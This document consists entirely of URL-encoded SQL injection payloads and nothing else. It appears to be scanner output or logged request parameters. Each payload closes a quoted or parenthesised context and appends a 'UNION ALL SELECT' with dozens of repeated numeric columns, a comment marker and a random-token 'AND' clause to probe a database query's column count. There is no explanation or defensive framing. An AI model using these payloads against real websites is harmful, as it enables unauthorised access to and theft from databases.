-7742%27%29%29%20UNION%20ALL%20SELECT%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695--%20%20AND%20%28%28%27vbim%27%3D%27vbim -9625%27%29%29%20UNION%20ALL%20SELECT%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828%2C%209828--%20%20AND%20%28%28%27yzLt%27%3D%27yzLt -1382%27%29%29%20UNION%20ALL%20SELECT%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538%2C%205538--%20%20AND%20%28%28%27OkwM%27%3D%27OkwM -4105%27%29%29%20UNION%20ALL%20SELECT%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203--%20%20AND%20%28%28%27WWIb%27%3D%27WWIb -7551%27%29%29%20UNION%20ALL%20SELECT%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411%2C%203411--%20%20AND%20%28%28%27aSvo%27%3D%27aSvo -6947%27%29%29%29%20UNION%20ALL%20SELECT%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044%2C%208044--%20%20AND%20%28%28%28%27npjd%27%3D%27npjd -7421%27%29%29%29%20UNION%20ALL%20SELECT%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987%2C%202987--%20%20AND%20%28%28%28%27pCHY%27%3D%27pCHY -6937%27%29%29%29%20UNION%20ALL%20SELECT%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148%2C%201148--%20%20AND%20%28%28%28%27hynO%27%3D%27hynO -1535%27%29%29%29%20UNION%20ALL%20SELECT%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475--%20%20AND%20%28%28%28%27FcPj%27%3D%27FcPj -5886%27%29%29%29%20UNION%20ALL%20SELECT%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686%2C%203686--%20%20AND%20%28%28%28%27YyHQ%27%3D%27YyHQ -9698%27%29%29%29%20UNION%20ALL%20SELECT%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553--%20%20AND%20%28%28%28%27CrJm%27%3D%27CrJm -8939%27%29%29%29%20UNION%20ALL%20SELECT%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272%2C%203272--%20%20AND%20%28%28%28%27uwGV%27%3D%27uwGV -1603%27%29%29%29%20UNION%20ALL%20SELECT%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588--%20%20AND%20%28%28%28%27FFgw%27%3D%27FFgw -7034%27%29%29%29%20UNION%20ALL%20SELECT%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569--%20%20AND%20%28%28%28%27hemK%27%3D%27hemK -2811%27%29%29%29%20UNION%20ALL%20SELECT%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040%2C%202040--%20%20AND%20%28%28%28%27VsOT%27%3D%27VsOT -8569%27%20UNION%20ALL%20SELECT%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086%2C%203086--%20%20AND%20%27BIOs%27%3D%27BIOs -3202%27%20UNION%20ALL%20SELECT%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046%2C%201046--%20%20AND%20%27ecQe%27%3D%27ecQe -3411%27%20UNION%20ALL%20SELECT%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430%2C%206430--%20%20AND%20%27enyP%27%3D%27enyP -5567%27%20UNION%20ALL%20SELECT%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104%2C%201104--%20%20AND%20%27IVlu%27%3D%27IVlu -4372%27%20UNION%20ALL%20SELECT%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752--%20%20AND%20%27sQJr%27%3D%27sQJr -4121%27%20UNION%20ALL%20SELECT%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557%2C%208557--%20%20AND%20%27hMJq%27%3D%27hMJq -5777%27%20UNION%20ALL%20SELECT%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292--%20%20AND%20%27McLo%27%3D%27McLo -2452%27%20UNION%20ALL%20SELECT%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523%2C%202523--%20%20AND%20%27WCsb%27%3D%27WCsb -1802%27%20UNION%20ALL%20SELECT%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389--%20%20AND%20%27LZtM%27%3D%27LZtM -8483%27%20UNION%20ALL%20SELECT%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608%2C%209608--%20%20AND%20%27oIdi%27%3D%27oIdi -9465%27%29%20UNION%20ALL%20SELECT%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063%2C%204063--%20%20AND%20%28%27XRuK%27%20LIKE%20%27XRuK -9504%27%29%20UNION%20ALL%20SELECT%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735%2C%208735--%20%20AND%20%28%27MkBU%27%20LIKE%20%27MkBU -5679%27%29%20UNION%20ALL%20SELECT%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965%2C%201965--%20%20AND%20%28%27ZHQw%27%20LIKE%20%27ZHQw -7528%27%29%20UNION%20ALL%20SELECT%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253--%20%20AND%20%28%27dvIu%27%20LIKE%20%27dvIu -4839%27%29%20UNION%20ALL%20SELECT%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550%2C%204550--%20%20AND%20%28%27EGZc%27%20LIKE%20%27EGZc -3119%27%29%20UNION%20ALL%20SELECT%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390%2C%202390--%20%20AND%20%28%27fuBB%27%20LIKE%20%27fuBB -4647%27%29%20UNION%20ALL%20SELECT%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861%2C%208861--%20%20AND%20%28%27FUcV%27%20LIKE%20%27FUcV -1024%27%29%20UNION%20ALL%20SELECT%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902--%20%20AND%20%28%27kCaj%27%20LIKE%20%27kCaj -1835%27%29%20UNION%20ALL%20SELECT%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510--%20%20AND%20%28%27kVut%27%20LIKE%20%27kVut -2889%27%29%20UNION%20ALL%20SELECT%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619%2C%202619--%20%20AND%20%28%27xjpQ%27%20LIKE%20%27xjpQ -7261%27%29%29%20UNION%20ALL%20SELECT%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749--%20%20AND%20%28%28%27HglT%27%20LIKE%20%27HglT -2773%27%29%29%20UNION%20ALL%20SELECT%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883%2C%204883--%20%20AND%20%28%28%27FIiG%27%20LIKE%20%27FIiG -3355%27%29%29%20UNION%20ALL%20SELECT%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798--%20%20AND%20%28%28%27kdlo%27%20LIKE%20%27kdlo -6255%27%29%29%20UNION%20ALL%20SELECT%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707%2C%209707--%20%20AND%20%28%28%27BGTW%27%20LIKE%20%27BGTW -7974%27%29%29%20UNION%20ALL%20SELECT%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872--%20%20AND%20%28%28%27JdWV%27%20LIKE%20%27JdWV -7137%27%29%29%20UNION%20ALL%20SELECT%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198--%20%20AND%20%28%28%27AaiH%27%20LIKE%20%27AaiH -6572%27%29%29%20UNION%20ALL%20SELECT%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765%2C%202765--%20%20AND%20%28%28%27mYEc%27%20LIKE%20%27mYEc -8581%27%29%29%20UNION%20ALL%20SELECT%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113%2C%203113--%20%20AND%20%28%28%27WvxM%27%20LIKE%20%27WvxM -6861%27%29%29%20UNION%20ALL%20SELECT%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393%2C%207393--%20%20AND%20%28%28%27WFmr%27%20LIKE%20%27WFmr -5810%27%29%29%20UNION%20ALL%20SELECT%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270--%20%20AND%20%28%28%27xlkm%27%20LIKE%20%27xlkm 